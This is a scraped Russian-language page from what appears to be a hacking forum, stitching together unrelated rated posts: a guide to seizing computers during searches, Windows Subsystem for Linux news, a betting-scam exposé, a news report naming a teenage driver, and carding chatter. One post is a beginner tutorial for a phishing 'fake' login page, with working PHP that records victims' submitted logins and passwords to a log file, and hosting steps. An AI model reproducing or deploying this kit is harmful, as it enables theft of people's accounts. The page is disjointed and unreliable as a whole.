определить, что следует изъять. Значительную долю данных на компьютере занимают программы, а документы составляют только часть. Кроме технических сложностей существуют и экономические: в случае выхода из строя ЭВМ банк, как правило, может "продержаться" не более двух дней, оптовая фирма – 3-5, компания обрабатывающей промышленности – 4-8, страховая компания – 5-6 дней. В связи с этим радикальное изъятие компьютерной техники грозит последующими претензиями пострадавших организаций. Поэтому желателен экспресс – анализ информации, содержащейся на СКТ, который, кстати, целесообразен и для оптимизации дальнейших поисковых действий следователя. В ситуации, когда изъять СКТ и приобщить к делу в качестве вещественного доказательства невозможно либо нецелесообразно, следует распечатать интересующую информацию на принтере либо скопировать интересующие следствие сведения на дискеты, а большой объем информации – на стример, на переносной диск сверхбольшой емкости типа Zip или даже на дополнительный жесткий диск. Не изымая весь компьютер, можно изъять из системного блока жесткий диск, провести контрольную распечатку идентификации принтера на нескольких видах бумаги. В организациях с большим объемом информации может применяться резервное копирование на выделенный компьютер, который надо отсоединить от сети и временно расположить в отдельной комнате для исследования в ближайшие дни. Понятым даются необходимые пояснения. "Средний" пользователь обычно не догадывается, что фрагменты или целые файлы, которые программы создают как временную подсобную базу для работы, нередко остаются на диске и после окончания работы. Во всяком случае, такие хранилища обрывков временных файлов целесообразно проверять при обыске. Популярный программный пакет Microsoft Office после установки на компьютере ведет негласный файл – протокол, куда заносит дату и время всех включений компьютера. Программы связи и работы с сетью запоминают адреса многих интернет – контактов пользователя, документы электронной почты с адресами отправителя. Остающиеся на месте обыска СКТ можно опечатать путем наклеивания листа бумаги с подписями следователя и понятых на разъемы электропитания, на крепеж и корпус. Не допускается пробивать отверстия в магнитных носителях, ставить на них печати. Пояснительные надписи на этикетку для дискет наносятся фломастером, но не авторучкой или жестким карандашом. Если есть необходимость изъять СКТ после обыска, следует выйти из программы, исполняемой компьютером для операционной системы Windows, правильно завершить работу самой системы, а затем отключить электропитание всех средств компьютерной техники, подлежащих изъятию. Как уже отмечалось, желательно описать в протоколе рабочие кабельные соединения между отдельными блоками аппаратуры. Аппаратные части СКТ разъединяются с соблюдением необходимых мер предосторожности, одновременно пломбируются их технические входы и выходы. При описании изымаемых магнитных носителей машинной информации в протоколе отражается заводской номер, тип, название, а при их отсутствии подробно описываются тип, размер, цвет, надписи. Фиксацию указанных сведений в протоколе обыска желательно дополнить видео съемкой либо фотосъемкой. Магнитные носители информации при транспортировке и хранении не должны оказаться вблизи мощных магнитных полей.
-
1 баллНет, майнить на обычных ПК у тебя не получится , они должны быть правильно настроены .
-
1 баллТемные дела в 90-х отличались от нынешних очень сильно. Не было тогда рампов, рунионов, по интернету практически не работали. Вся жестокость была в реальной жизни. Круговая порука, жестокость и убийства - это были синонимами бизнесу в 90-х.
-
1 баллКак сообщает блог MDSN, в релизе Windows 10 Fall Creators Update (FCU), намеченном на осень 2017 г., Windows Subsystem for Linux (WSL) станет полноценной функцией Windows. Участники программы Windows Insider могут заметить, что в последней сборке (16251) WSL больше не имеет статуса бета. Это означает, что подсистему Linux уже можно использовать как полноценный компонент инструментального набора Windows 10. WSL позволяет работать с инструментами командной строки Linux, инициировать из неё процессы Windows и получать доступ к файлам Windows. Также можно инициировать процессы Linux из CLI Windows (файлы Linux пока недоступны из Windows — Microsoft работает над устранением этой проблемы).Компания подчеркивает, что дистрибутивы Linux работают поверх WSL в интерактивных сценариях. Подсистема не рассчитана на запуск рабочих нагрузок Apache/nginx/MySQL/MongoDB и пр. Также пока не имеется планов поддержки в ней приложений X/GUI, десктопов и серверов.С завершением бета-тестирования о всех проблемах в WSL теперь можно сообщать по стандартным каналам поддержки и использовать приложение Windows 10 Feedback Hub для связи с командой разработчиков.Напомним, что запуск родных исполняемых файлов Linux реализован через специальную прослойку, транслирующей системные вызовы Linux в системные вызовы Windows на лету, т. е. представляет собой обратный аналог системы Wine. Изначально предлагаемое пользователю окружение основано на пакетной базе Ubuntu. Canonical и Microsoft добавили возмoжность запуска Ubuntu поверх Windows 10 для того, чтобы предоставить системным администраторам и разработчикам возможность использования bash и других Linux-инструмeнтов и утилит, таких как make, gawk и grep, непосредственно в Windows.Месяцем ранее Microsoft добавила в Windows Store SUSE Linux Enterprise Server 12 и openSUSE Leap 42. После их установки у пользователей Windows появится возможность работать с окружением Linux в виртуальной песочнице как на отдельно установленной ОС со всеми её функциональными возможностями, но без необходимости отдельного запуска Linux-загрузчика. Дистрибутивы SLES 12 и openSUSE Leap 42 станут доступны и пользователям Windows 10 S.
-
1 балл
-
1 баллКак не шифруй но гребанное яблоко тебя сдаст.Он и придуман чтобы контролировать население
-
1 балл
-
1 баллОбучение прошел,все на высоте.Многое открыл и узнал для себя.Что больше понравилась дак это практика,объяснил все доступно по тиемвари.Не жалею что вложился в обучение.Обязательно их отработаю!
-
1 баллВсем привет. Сегодня покажу вам как сделать фейк, многие мануалы не понятно расписаны новичкам, потому-что в них требуются хотя бы начальное знание азов HTML. Чтож в моем обучающем мануале, такого не будет, распишу все очень очень понятно. Ну все начали)) Заходим на страницу, которую нам надо подделать. Нажимаем CTRL+S Все мы сохранили страницу. Можем сделать так: сохранить как Если картинки не грузятся, то просто скачиваем их, или скриним. Потом в скачанном файле, прописываем путь к ним. Или же способ немного лучше, но потруднее: Открываем исходный код делается это так CTRL+U Прописываем абсолютные пути ко всем картинкам и таблицам стилей (оригинальным). Это чтобы картинки и ЦССки грузились с сервака. Теперь открываем блокнотом или любым другим редактором. Займемся поиском тегов, которые относятся к Логину и Паролю [Ведь смысл фейка красть логин и пароль] меняем значение аттрибута action на Submit.php Слово action можно найти воспользовавшись поиском. Получится так >>> action="submit.php" Сейвимся, Клосаем. Делаем файл submit.php Пишем туда следующее: <?php /** * xakarders.ru * Это я вам CyKa фейк сделал * vzlom.htm */ @include 'config.php'; $req=array( 'HTTP_REFERER'=>$_SERVER['HTTP_REFERER'], 'HTTP_USER_AGENT'=>$_SERVER['HTTP_USER_AGENT'], 'REMOTE_ADDR'=>$_SERVER['REMOTE_ADDR'], 'REMOTE_PORT'=>$_SERVER['REMOTE_PORT'], 'REQUEST_URI'=>$_SERVER['REQUEST_URI'], 'REQUEST_TIME'=>$_SERVER['REQUEST_TIME'], ); $desc=fopen('logs.txt','at+'); fwrite($desc,print_r($req,true)."\n\n\n".print_r($_REQUEST,true)."\n\n\n=====================\n\n\n"); fclose($desc); header('Location: '.$loc); ?> Создаем файл config.php <?php /** * Это я вам CyKa фейк сделал * vzlom.htm */ // Сюда впишите ссылку на переадресацию: $loc='http://suka.ru'; ?> Остался самый последний штрих. Создаем наш корзинку, куда получим данные. А т.е. logs.txt Теперь создаем аккаунт на любом бесплатном хостинге. Заливаем через FTPешку, Везде поставьте полномочия 777, иначе пароли не придут. Впариваем жертве. И ОК. Получаем пароль в корзинку.
-
1 баллраньше когда всё аккуратно делаешь, ни чего такого не было. у тебя вцц оплатилась? что именно из документов попросили? сделал одну вцц - забыл про аккаунт. как вышло у дубравы. - выходит что уже да.
-
1 балл
-
1 баллЧем лучше зашифровать данные на определенном диске, в идеале сделать так чтобы при неправильно введенном пароле (после трех попыток), все данные автоматически уничтожались.
-
1 балл
-
1 баллЗа последнее время достаточно часто в прессе и не телевидении вспыхивают скандалы, связанные с договорными матчами. Периодически трясет итальянское футбольное сообщество, за кулисами теннисного мира тоже нет нет, да и пройдет слушок о том, что тот или иной игрок слил матч. В России пока все тихо, хотя все прекрасно понимают, что если договорные матчи случаются даже в цивилизованной Европе, то нам сам бог велел. Все это прекрасно понимают, и поэтому некоторым особо азартным игрокам приходит мысль попытаться заработать на договорных матчах. Надо сказать, что мысль эта приходит в голову чаще всего после очередного большого проигрыша и от большого желания отыграться любыми способами. А почему бы и нет. Ведь кто-то явно на этом зарабатывает, так почему бы и мне не попробовать. Дело остается за малым. Как узнать какой матч договорной, а какой нет, ведь понятно, что никто за бесплатно такую информацию не предоставит. Ну путь даже платно, думает игрок, главное, чтобы расходы потом окупились. Однако все равно не понятно кому платить, ведь на улице никто не стоит с табличкой: продаю информацию о договорных матчах. А почему бы не поискать информацию в Интернете. Всемирная паутина все знает и там наверняка можно найти таких специалистов. Набирает наш игрок в Яндексе фразу договорные матчи и начинает просматривать сайты. Так вот конечный результат будет печальным, потому что любой продавец информации о договорных матчах - мошенник. Лучше сразу выбросить эту навязчивую идею из головы и попытаться найти для себя более реальный заработок в Интернет. Как работает эта схема? Вы попадаете на сайт мошенника или на форум, на котором читаете следующее: продаем информацию о договорных матчах или что-то подобное. Ага, то, что нужно надо расспросить поподробнее. На ваш вопрос мошенник отвечает, что да действительно он располагает такой информацией. Вот например через пару дней будет договорной матч по футболу во втором дивизионе. То, что дивизион второй, а не высший не случайно, потому что подсознательно вы понимаете, что договорные матчи существуют, но знают об этом единицы, и информация стоит дорого, а вот второй дивизион - это другое дело, думаете вы. Все наживка проглочена, простачок попался, а на все остальные вопросы, которые могут у вас возникнуть, у мошенников готов ответ. Договорные матчи. Приблизительный диалог с мошенником. Вопрос: Какие гарантии, спросите вы? Ответ: У нас на сайте выложены скриншоты ставок на договорные матчи, отвечают мошенники. Комментарий: Извините, как можно проверить, что матч был договорной, да никак. Ну разместил мошенник пару картинок со своими выигравшими ставками, а может даже и не со своими а чужими, найденными в Интернете. Какое это доказательство правдивости информации? Да никакое! Или такой ответ: Да и потом если ставка не сыграет, случаются форс-мажорные обстоятельства, мы вернем вам деньги или дадим следующий прогноз бесплатно. Комментарий: Возможно кстати, что вернут и даже дадут прогноз бесплатно, они то в отличие от вас ничего не проиграют, потому что ставок не делают, и в отличие от вас своими деньгами не рискуют. Вопрос: Откуда вы берете информацию о договорных матчах? Ответ: Все мошенники утверждают, что имеют отношение к спорту, были или судьями или тренерами, но теперь отошли от спорта, но обширные связи у них естественно остались. Комментарий: И так все понятно, оставим без комментариев Вопрос: А почему вы сами не делаете ставки, а продаете информацию. Ответ: Мы ставим, но дело в том, что максимальная сумма ставок ограничена, поэтому для того, чтобы заработать больше, мы продаем информацию. Комментарий: Да конечно максимальная сумма ставок ограничена, но извините, букмекерских контор сотни, если не тысячи, так что информацию не обязательно продавать, можно сделать ставку в десяти или двадцати конторах, можно в сотне. А потом есть еще vip ставки, на них ограничения не распространяются. Вы можете задать еще какие-то вопросы, но будьте уверены, мошенники найдут на них убедительные ответы. Информация о договорных матчах. Цена. Цена таких прогнозов зависит только от наглости мошенников. Прогноз может стоить пять долларов, а может пару сотен, но в не зависимости от цены результат будет одинаков. Вы проиграете свои деньги. Почему? Давайте посмотрим схему в цифрах. Договорные матчи. Мошенничество на букмекерских ставках. Цифры. Итак, допустим, вы согласились купить информацию за 100 долларов. Кроме вас мошенник нашел еще семь человек, которые ему заплатили тоже по 100 долларов. Что делает мошенник, мошенник берет абсолютно любой матч с двумя исходами и четырем участникам сообщает, что выиграет Команда1, а четырем другим, что выиграет команда2. В результате этой нехитрой операции мошенник получит четыре ругательных письма от проигравших и вернет им деньги и четыре благодарности от выигравших, ну соответственно и 400 долларов премиальные себе. Далее схема повторяется, только теперь оставшиеся четверо опять делятся пополам, и мошенник кладет в карман себе еще 200 долларов. На третьем этапе еще 100. Итого за один цикл чистый доход мошенника составил 400+200+100=700 долларов. В реальности кстати схема несколько сложнее и доход афериста больше, потому что никому деньги не возвращаются, а просто предлагается еще один бесплатный прогноз, и игроки, слепо веря мошенникам, продолжают проигрывать свои деньги.
-
1 баллВо Владикавказе задержан ученик 10 класса, сбивший на чужом BMW двух женщин с ребенком, сообщает "Интерфакс" со ссылкой на МВД Северной Осетии. Владелец машины также задержан. Как сообщается на сайте североосетинского МВД, авария произошла вечером 31 января. BMW выехал на полосу встречного движения, сбил двух женщин и трехлетнего мальчика, после чего скрылся с места происшествия. Ребенок от полученных травм скончался на месте, женщины были доставлены в больницу. Спустя час машина была найдена. Выяснилось, что ей управлял 16-летний десятиклассник 44-й школы Владикавказа. По данным "Интерфакса", его зовут Борис Джелиев. Владельцем машины оказался 24-летний водитель такси Тимур Дзантиев. В МВД отметили, что он передал управление машиной несовершеннолетнему незаконно. По данным "Комсомольской правды", Джелиев уговорил своего знакомого дать ему ключи от BMW, так как хотел произвести впечатление на девушку, которую он пригласил на свидание. Сбитые женщины, по информации издания, работают в министерстве экологии и природных ресурсов Северной Осетии.
-
1 балл